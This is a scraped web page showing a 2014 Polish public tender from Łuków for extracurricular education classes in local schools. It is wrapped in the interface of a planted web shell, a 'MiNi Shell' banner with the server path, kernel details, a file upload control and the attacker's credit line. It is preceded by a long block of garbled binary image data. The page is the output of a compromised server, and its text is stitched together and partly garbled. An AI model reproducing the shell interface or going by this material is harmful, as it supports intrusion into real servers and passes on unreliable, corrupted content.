JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140904/189431-N-2014.html

<p class="kh_header"><b>Łuków: Zakup usługi edukacyjnej w zakresie przeprowadzenia dla uczniów (Uczestników Projektu) zajęć pozalekcyjnych w ramach projektu Edukacja kluczem do lepszego życia</b><br>
<b>Numer ogłoszenia: 189431 - 2014; data zamieszczenia: 04.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zespół Oświatowy , ul. Świderska 12, 21-400 Łuków, woj. lubelskie, tel. 25 798 24 40, faks 25 798 24 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gzolukow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usługi edukacyjnej w zakresie przeprowadzenia dla uczniów (Uczestników Projektu) zajęć pozalekcyjnych w ramach projektu Edukacja kluczem do lepszego życia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi edukacyjnej w zakresie przeprowadzenia dla uczniów (Uczestników Projektu) zajęć pozalekcyjnych (dodatkowych, wyrównawczych oraz specjalistycznych) w ramach realizacji projektu pn. Edukacja kluczem do lepszego życia współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
1.1.	W ramach realizacji przedmiotu zamówienia, do podstawowych obowiązków Wykonawcy należy:
a)	przygotowanie programu realizowanych zajęć w formie pisemnej, dostosowanego do potrzeb        i możliwości uczniów (program winien zawierać m.in.: cel ogólny i szczegółowe, treści nauczania, procedury osiągania celów (metody, formy, środki dydaktyczne) przewidywane osiągnięcia, sposób ewaluacji efektów realizacji zajęć); program powinien uwzględniać założenia i cele realizowanego projektu Edukacja kluczem do lepszego życia;
b)	przeprowadzenie zajęć przedmiotowych zgodnie z przedstawionym programem oraz harmonogramem zajęć, gwarantującym rozłożenie zajęć w miarę równomiernie w czasie w ciągu tygodnia i miesiąca, zatwierdzonym przez dyrektora szkoły i kierownika projektu, w której będą realizowane zajęcia;
c)	uzgadnianie z kierownikiem projektu wszelkich zmian w realizacji planu zajęć wynikających z zaistniałych ważnych powodów;
d)	systematyczne prowadzenie dokumentacji związanej z realizacją przedmiotu zamówienia;
e)	terminowe przekazywanie dokumentacji projektowej do Biura Projektu;
f)	udostępnianie dyrektorowi szkoły oraz kierownikowi projektu na żądanie, prowadzonej dokumentacji związanej z realizacją przedmiotu zamówienia;
g)	informowanie o stanie realizacji przedmiotu zamówienia na wniosek Zamawiającego, kierownika projektu, Instytucji Pośredniczącej i innych osób uprawnionych do nadzoru.
1.Szkoła Podstawowa w Gołąbkach
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- j. polski 2gr x 30h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych przygotowujące do konkursów uczniów szczególnie uzdolnionych- j. polski 1gr x 30h= 30h
 Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- przyroda 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- matematyka 3gr x 30h= 90h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych przygotowujące do konkursów uczniów szczególnie uzdolnionych- matematyka 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- j. obcy (j. angielski) 4gr x 30h= 120h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- informatyka 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- kinezjologia mózgu 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- historia i wos 2gr x 30h= 60h
Zajęcia dydaktyczno- wyrównawcze- j. polski 2gr x 30h= 60h
Zajęcia dydaktyczno- wyrównawcze dla uczniów z deficytami- j. polski 2gr x 30h= 60h
Zajęcia dydaktyczno- wyrównawcze- j. obcy (j. angielski) 1gr x 30h= 30h
Zajęcia dydaktyczno- wyrównawcze- matematyka 3gr x 30h= 90h
Zajęcia korekcyjno- kompensacyjne 1gr x 30h= 30h	750
2.Gimnazjum w Gołąbkach
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- j. polski 2gr x 30h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych przygotowujące do konkursów uczniów szczególnie uzdolnionych- j. polski 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- matematyka 2gr x 30h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych przygotowujące do konkursów uczniów szczególnie uzdolnionych- matematyka 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- historia 2gr x 30h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- informatyka 2gr x 30h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- kinezjologia mózgu 2gr x 30h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- j. obcy (j. angielski) 2gr x 30h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- przyroda 2gr x 30h= 60h
Zajęcia dydaktyczno- wyrównawcze- j. polski 4gr x 30h= 120h
Zajęcia dydaktyczno- wyrównawcze dla uczniów z deficytami- j. polski 1gr x 30h= 30h
Zajęcia korekcyjno- kompensacyjne 1gr x 30h= 30h
Zajęcia dydaktyczno- wyrównawcze- matematyka 5gr x 30h= 150h
Zajęcia dydaktyczno- wyrównawcze- j. obcy (j. angielski) 3gr x 30h= 90h
Zajęcia dydaktyczno- wyrównawcze- przyroda 1gr x 30h= 30h	930
3. Szkoła Podstawowa w Krynce
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- j. polski 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych przygotowujące do konkursów uczniów zdolnych- j. polski 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- matematyka 3gr x 30h= 90h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych przygotowujące do konkursów uczniów zdolnych- matematyka 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- j. obcy (j. angielski) 4gr x 30h= 120h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- przyroda 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- informatyka 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- kinezjologia mózgu 2gr x 30h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- historia 1gr x 30h= 30h
Zajęcia dydaktyczno- wyrównawcze- j. polski 4gr x 30h= 120h
Zajęcia dydaktyczno- wyrównawcze dla uczniów z deficytami- j. polski 1gr x 30h= 30h
Zajęcia korekcyjno- kompensacyjne 1gr x 30h= 30h
Zajęcia dydaktyczno- wyrównawcze- matematyka 2gr x 30h= 60h
Zajęcia dydaktyczno- wyrównawcze- j. obcy (j. angielski) 2gr x 30h= 60h
Zajęcia z gimnastyki korekcyjnej- 2gr x 30h= 60h
4. Gimnazjum w Krynce
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- j. polski 2gr x 30h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych przygotowujące do konkursów uczniów zdolnych- j. polski 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- matematyka 3gr x 30h= 90h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych przygotowujące do konkursów uczniów zdolnych- matematyka 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- j. obcy (j. angielski) 4gr x 30h= 120h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- informatyka 1gr x 30h= 30h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- kinezjologia mózgu 1gr x 30h= 30h
Zajęcia dydaktyczno- wyrównawcze- j. polski 3gr x 30h= 90h
Zajęcia dydaktyczno- wyrównawcze dla uczniów z deficytami- j. polski 2gr x 30h= 60h
Zajęcia korekcyjno- kompensacyjne 1gr x 60h= 60h
Zajęcia dydaktyczno- wyrównawcze- j. obcy (j. angielski) 2gr x 60h= 120h
Zajęcia z gimnastyki korekcyjnej- 1gr x 30h= 30h
Zajęcia dydaktyczno- wyrównawcze- przyroda 1gr x 30h= 30h
5. Szkoła Podstawowa w Rolach
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- j. polski 1gr x 60h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych przygotowujące do konkursów uczniów zdolnych- j. polski 1gr x 60h= 60h
Zajęcia dodatkowe klub literacko- teatralny 1gr x 60h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych przygotowujące do konkursów uczniów zdolnych- matematyka 1gr x 60h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- matematyka 1gr x 60h= 60h
Zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych- matematyczno- informatyczne 1gr x 60h= 60h
Zajęcia dydaktyczno- wyrównawcze- j. polski 1gr x 60h= 60h
Zajęcia dydaktyczno- wyrównawcze dla uczniów z deficytami- j. polski 1gr x 60h= 60h
Zajęcia terapii sensorycznej- 1gr x60h= 60h
Zajęcia korekcyjno- kompensacyjne 1gr x 60h

Zamawiający zapewni odpowiednie sale do realizacji przedmiotu zamówienia przez Wykonawcę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunków nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału  w postępowaniu, określonych w art. 22 ust. 1 pkt 1 ustawy Pzp (wzór oświadczenia stanowi załącznik nr 2 do SIWZ), zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunków nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 2 ustawy Pzp (wzór oświadczenia stanowi załącznik nr 2 do SIWZ), z uwzględnieniem informacji zawartych w dokumencie wymienionym w Rozdziale 7 pkt 1.7. SIWZ (o ile wykonawca składa taki dokument), zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 3 ustawy Pzp (wzór oświadczenia stanowi załącznik nr 2 do SIWZ) oraz w oparciu o informacje zawarte w dokumencie wymienionym w Rozdziale 7 pkt 1.7. SIWZ (o ile wykonawca składa taki dokument) i w dokumencie wymienionym w Rozdziale 7 pkt 1.6., tj. o udzielenie zamówienia mogą ubiegać się Wykonawcy dysponujący odpowiednim potencjałem technicznym.
W zakresie warunków wskazanych w punkcie 1.3. ocena spełnienia warunków nastąpi zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy dysponujący osobami zdolnymi do wykonania zamówienia, które spełniają wymagania w zakresie posiadania niezbędnych kwalifikacji zawodowych, doświadczenia i wykształcenia zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r. Nr 50, poz. 400 z późn zm.).
W zakresie warunków wskazanych w punkcie 1.3. ocena spełnienia warunków nastąpi zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunków nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 4 ustawy Pzp (wzór oświadczenia stanowi załącznik nr 2 do SIWZ), z uwzględnieniem informacji zawartych w dokumencie wymienionym w Rozdziale 7 pkt 1.7 SIWZ (o ile wykonawca składa taki dokument), zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
1) Zamawiający dopuszcza zmianę osoby wskazanej w ofercie w Załączniku Wykaz osób, która będzie uczestniczyć w wykonywaniu zamówienia, na osobę spełniającą wymagania określone w SIWZ jedynie w formie pisemnej, w przypadkach wystąpienia sytuacji losowych udokumentowanych przez Wykonawcę tylko i wyłącznie za pisemną zgodą Zamawiającego;
2)	W przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności  i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;
3)	Dopuszcza się aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gzolukow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Oświatowy w Łukowie
21-400 Łuków, Świderska 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2014 godzina 14:00, miejsce: Gminny Zespół Oświatowy w Łukowie
21-400 Łuków, Świderska 12
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest realizowane w ramach projektu Edukacja kluczem do lepszego życia współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com